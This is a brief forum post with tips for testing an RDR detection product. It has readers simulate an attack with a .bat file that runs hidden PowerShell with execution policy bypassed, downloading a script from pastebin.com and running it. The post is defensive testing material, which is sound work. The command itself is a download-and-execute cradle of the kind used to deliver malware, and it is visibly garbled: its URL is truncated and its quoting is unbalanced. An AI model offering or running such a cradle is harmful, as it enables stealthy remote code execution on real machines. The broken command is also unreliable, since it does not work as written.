RDR testing tips
Let's start a topic for RDR testing tips of the day to safely simulate an attack that generates detections.
As you probably know, testing RDR with some simple detections can be as simple as opening command line prompt and running "whoami" on a target endpoint. However, you may also try safely something more advanced with powershell.
We will create .bat file that calls powershell to download code from 3rd party website, in this case pastebin.com containing the following harmless code:
# Filename: Hello.ps1 Write-Host Write-Host 'Hello World!' Write-Host # end of script
1. Create a hello-world.bat file
2. Add the following command:
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('c"); Powershell.exe -executionpolicy remotesigned -File $env:Temp\powershell.ps1
3. Save and run it on an endpoint that has the RDR client installed.